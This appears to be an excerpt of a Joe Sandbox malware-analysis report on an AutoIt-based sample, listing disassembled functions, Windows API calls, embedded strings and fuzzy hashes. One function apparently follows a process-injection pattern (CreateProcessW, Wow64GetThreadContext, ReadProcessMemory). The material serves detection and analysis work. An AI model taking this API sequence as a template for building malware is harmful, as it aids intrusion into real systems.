_memset.LIBCMT ref: 00E456AB
_memcpy_s.LIBCMT ref: 00E4571D
__read_nolock.LIBCMT ref: 00E4577B
__filbuf.LIBCMT ref: 00E4579E
_memset.LIBCMT ref: 00E457E2

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 18f45522e619e12dfbd947f7959408d293017b3a6bb515890221e4aad8321f5b
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: EC51C432A00B05DBDB248F79E8886AE77B5AF40324F25977AF835B72D2D7709D548B40

Function 00E269CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00E24F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E24F6F

_free.LIBCMT ref: 00E5E68C
_free.LIBCMT ref: 00E5E6D3

Part of subcall function 00E26BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E26D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00E5E462
Bad directive syntax error, xrefs: 00E5E6BB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 8f18f189f557c60750949d41b2d3cd880cde09ed4d31edbdb87bd49301847cf5
Instruction ID: d0dbf9dd406430d4eb0d4a4484b0ca4c4e02af33723cf167fdca257c0adb3fa5
Opcode Fuzzy Hash: 8f18f189f557c60750949d41b2d3cd880cde09ed4d31edbdb87bd49301847cf5
Instruction Fuzzy Hash: 869180719102299FCF08EFA4D8919EDB7F4FF19315F14646AF815BB291EB30AA09CB50

Function 00E235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E235A1,SwapMouseButtons,00000004,?), ref: 00E235D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E235A1,SwapMouseButtons,00000004,?,?,?,?,00E22754), ref: 00E235F5
RegCloseKey.KERNELBASE(00000000,?,?,00E235A1,SwapMouseButtons,00000004,?,?,?,?,00E22754), ref: 00E23617

Strings

Control Panel\Mouse, xrefs: 00E235D2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 09de04ac243999cb820a46d6202a0d0a372255f3643e4664c73008a0ab988609
Instruction ID: faa31784282bd1962716afcd741635bf232efcb9aabba1e7749e3675055e4736
Opcode Fuzzy Hash: 09de04ac243999cb820a46d6202a0d0a372255f3643e4664c73008a0ab988609
Instruction Fuzzy Hash: 4F114871610228BFDB20CFA5EC80AEEB7BCEF05744F0154A9E805E7210E271AE449B60

Function 01911300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01911ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01911B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01911B73

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 900600e1d5cf881bb45b4f2cea00e1350c7e109812519e09e7f9e48650ed674a
Instruction ID: 1d5be6cb59bb2ec2a6cbbbb9351e44756b3309d3b204f8697e89511deb6a8aa8
Opcode Fuzzy Hash: 900600e1d5cf881bb45b4f2cea00e1350c7e109812519e09e7f9e48650ed674a
Instruction Fuzzy Hash: F6620930A14258DBEB24CFA4C840BDEB776EF58301F1095A9D20DEB394E7769E81CB59

Function 00E4493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E449D0
__flush.LIBCMT ref: 00E449F0
__write.LIBCMT ref: 00E44A23
__flsbuf.LIBCMT ref: 00E44A51

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: f2717002921725bdb2039d2f895175ad1a3a6da40a749e085468a2ea65858a36
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: FC41E8B1B006069BDF18CE69E880BAF77A5EFC4354B24913DE955E76C0E770DD40A744

Function 00E24DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E24E1A

Strings

AU3!P/, xrefs: 00E24E14
EA06, xrefs: 00E5DCF5

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/$EA06
API String ID: 4104443479-182974850
Opcode ID: da4f1b1b076417af167873bd12669d7bc7c95b1409fd20ea79dc3e3729ee8cfa
Instruction ID: 03d8c04a015c0a26f742feadbc8b26c9f7644f90f44ff4da30c50698dfc6826f
Opcode Fuzzy Hash: da4f1b1b076417af167873bd12669d7bc7c95b1409fd20ea79dc3e3729ee8cfa
Instruction Fuzzy Hash: FC418CB2A041785BEF219B64ED51BFE7FE2AB41304F297065EC42BF2C6C6319D4487A1

Function 00E273E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E5EE62
GetOpenFileNameW.COMDLG32(?), ref: 00E5EEAC

Part of subcall function 00E248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E248A1,?,?,00E237C0,?), ref: 00E248CE

Part of subcall function 00E409D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E409F4

Strings

X, xrefs: 00E5EE7A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 57dd8a6934717b54b507f85b0343b970e3099ae98f807ce36ec76dc356611516
Instruction ID: f20d0f0646cd98023c5729521da248763852c9a31e6cd18397380a0916277032
Opcode Fuzzy Hash: 57dd8a6934717b54b507f85b0343b970e3099ae98f807ce36ec76dc356611516
Instruction Fuzzy Hash: ED21C671A102589BCB15DF94DC457EE7BF89F49304F00545AF908F7382DBB4598E8B91

Function 00E8901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E89036
__fread_nolock.LIBCMT ref: 00E8904B

Strings

EA06, xrefs: 00E8907D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: d1dd0ca855c3fd41fb7110e71cda7636c5aad3adfaf0e0a13a446e438b0a06ef
Instruction ID: a6d4027f4621ff7f5cef7fcd47d6cf656c8d1ff7aa7fd4985998160582ad8f15
Opcode Fuzzy Hash: d1dd0ca855c3fd41fb7110e71cda7636c5aad3adfaf0e0a13a446e438b0a06ef
Instruction Fuzzy Hash: 9901F972C042586EDB28C6A8D816EFE7BF8DB05301F04419AF556E2182E5B5A704CB60

Function 00E89B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00E89B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E89B99

Strings

aut, xrefs: 00E89B93

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 885ddb0a649735715d86fe6a4282bb688b2cba545215f2efc188bb4a585cc730
Instruction ID: 179150432dc67310bef51b0c51d11d562390039232532b34aca4fc8c32f4b1e3
Opcode Fuzzy Hash: 885ddb0a649735715d86fe6a4282bb688b2cba545215f2efc188bb4a585cc730
Instruction Fuzzy Hash: 93D05E7954030DAFDB109BD0DC0EFDA772CE708702F0042B1FEA4A11A1EEB466998BA1

Function 00E9CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdd0a0e5551c0505439982211c19a2d3a7c17477abb544194b636f7b9253b44
Instruction ID: 66758806a9f3b3b031c1d428eb5c898c7d5fc516d8e7cf9d2898aab957389b6a
Opcode Fuzzy Hash: 6cdd0a0e5551c0505439982211c19a2d3a7c17477abb544194b636f7b9253b44
Instruction Fuzzy Hash: B5F15C719083119FCB14DF28C885A6ABBE5FF88314F14992EF899AB351D731E945CF82

Function 00E243DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E24401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E244A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E244C3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5f7ed9058dd9bf19882230faee5877d9d042a65bb4b93e3ff794b83f8b8f1b88
Instruction ID: 080022e2caba664c39fb093942cc0d2eedaa9c412aa6dae9b5d96c90bbfd4280
Opcode Fuzzy Hash: 5f7ed9058dd9bf19882230faee5877d9d042a65bb4b93e3ff794b83f8b8f1b88
Instruction Fuzzy Hash: 8331B1B05043508FC720EF35E884797BBE8FB58308F00092EF69AE7290D7B16948CB52

Function 00E4594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00E45963

Part of subcall function 00E4A3AB: __NMSG_WRITE.LIBCMT ref: 00E4A3D2
Part of subcall function 00E4A3AB: __NMSG_WRITE.LIBCMT ref: 00E4A3DC

__NMSG_WRITE.LIBCMT ref: 00E4596A

Part of subcall function 00E4A408: GetModuleFileNameW.KERNEL32(00000000,00EE43BA,00000104,?,00000001,00000000), ref: 00E4A49A
Part of subcall function 00E4A408: ___crtMessageBoxW.LIBCMT ref: 00E4A548

Part of subcall function 00E432DF: ___crtCorExitProcess.LIBCMT ref: 00E432E5
Part of subcall function 00E432DF: ExitProcess.KERNEL32 ref: 00E432EE

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,?,?,?,00E41013,?), ref: 00E4598F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bc1f2bbe58ca7045ceee96ddcf3e814c6757d13ba3c87f8c5aa13378710d7d18
Instruction ID: 07dfd5d471a6d0037223ee92e3a11be7b1c0d199c579478ad0b9ae5922c5b5dd
Opcode Fuzzy Hash: bc1f2bbe58ca7045ceee96ddcf3e814c6757d13ba3c87f8c5aa13378710d7d18
Instruction Fuzzy Hash: B701D233641A15DFE6123B76F842A6E72D89FD2774F10203AF620BA1D2DA709D018660

Function 00E89B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E897D2,?,?,?,?,?,00000004), ref: 00E89B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E897D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E89B5B
CloseHandle.KERNEL32(00000000,?,00E897D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E89B62

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a7114ac8310bd5c32e8e4f6170e5695b6c6925b6b7581fc14e0af19c4e1ad84c
Instruction ID: db0190cbe0282c5e61acf90a1efb0dc48e2aff6518e627aa6acd5e566f461868
Opcode Fuzzy Hash: a7114ac8310bd5c32e8e4f6170e5695b6c6925b6b7581fc14e0af19c4e1ad84c
Instruction Fuzzy Hash: 2FE02632281214BFDB312B91EC09FCA3B18AB0A761F104220FB54780E083B135158788

Function 00E88F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E88FA5

Part of subcall function 00E42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E49C64), ref: 00E42FA9
Part of subcall function 00E42F95: GetLastError.KERNEL32(00000000,?,00E49C64), ref: 00E42FBB

_free.LIBCMT ref: 00E88FB6
_free.LIBCMT ref: 00E88FC8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction ID: ae3956511ebc2fa6c4037a22715001fda05961711c2c874ac7aeeeea77a19f39
Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction Fuzzy Hash: F1E012B17097154ACA24B578BE40A935BEF5F483947D8281DBA0DFB142DE24F8458624

Function 00E2AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00E6002B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 49a6cef53cb8ae0551d10c12812e97915e21862f13cd2b8087efb359beec7d22
Instruction ID: ca6bd3c5cf5c0449aa9513120a7bf596c7b082d6d7f45fffce356942e05974a4
Opcode Fuzzy Hash: 49a6cef53cb8ae0551d10c12812e97915e21862f13cd2b8087efb359beec7d22
Instruction Fuzzy Hash: 8A225D70508361CFC724DF14D494B6ABBE1BF44344F19A96DE896AB362D731EC85CB82

Function 00E2492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E24992

Part of subcall function 00E435AC: __lock.LIBCMT ref: 00E435B2
Part of subcall function 00E435AC: DecodePointer.KERNEL32(00000001,?,00E249A7,00E781BC), ref: 00E435BE
Part of subcall function 00E435AC: EncodePointer.KERNEL32(?,?,00E249A7,00E781BC), ref: 00E435C9

Part of subcall function 00E24A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E24A73
Part of subcall function 00E24A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E24A88

Part of subcall function 00E23B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E23B7A
Part of subcall function 00E23B4C: IsDebuggerPresent.KERNEL32 ref: 00E23B8C
Part of subcall function 00E23B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EE62F8,00EE62E0,?,?), ref: 00E23BFD
Part of subcall function 00E23B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E23C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E249D2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 1a9ca0185d29b64dea9172283c35c1e02792911a2667244460e22bceecaff405
Instruction ID: 5564ec081d1c3e6f655e20e87284c97693e2468608280be96d20f87bdf1f5af2
Opcode Fuzzy Hash: 1a9ca0185d29b64dea9172283c35c1e02792911a2667244460e22bceecaff405
Instruction Fuzzy Hash: F911C0B19143659FC700DF2AEC4590AFFF8EB98750F00551EF194AB2B1DB709548CB91

Function 00E25DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E25981,?,?,?,?), ref: 00E25E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E25981,?,?,?,?), ref: 00E5E19C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d0fdae480bdfe295ef574e4b5f74822ba2462c78df438ec5752ed3673ea7ec6
Instruction ID: abba82f8db2b04566d75c618e140eaa82f2039cdaa64af479d6804c82374a79f
Opcode Fuzzy Hash: 9d0fdae480bdfe295ef574e4b5f74822ba2462c78df438ec5752ed3673ea7ec6
Instruction Fuzzy Hash: 20019E71244718BEF3240E24DD8AFB63B9CAB0576CF108718FAE5BA1E0C6B45E498B50

Function 00E40FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E4594C: __FF_MSGBANNER.LIBCMT ref: 00E45963
Part of subcall function 00E4594C: __NMSG_WRITE.LIBCMT ref: 00E4596A
Part of subcall function 00E4594C: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,?,?,?,00E41013,?), ref: 00E4598F

std::exception::exception.LIBCMT ref: 00E4102C
__CxxThrowException@8.LIBCMT ref: 00E41041

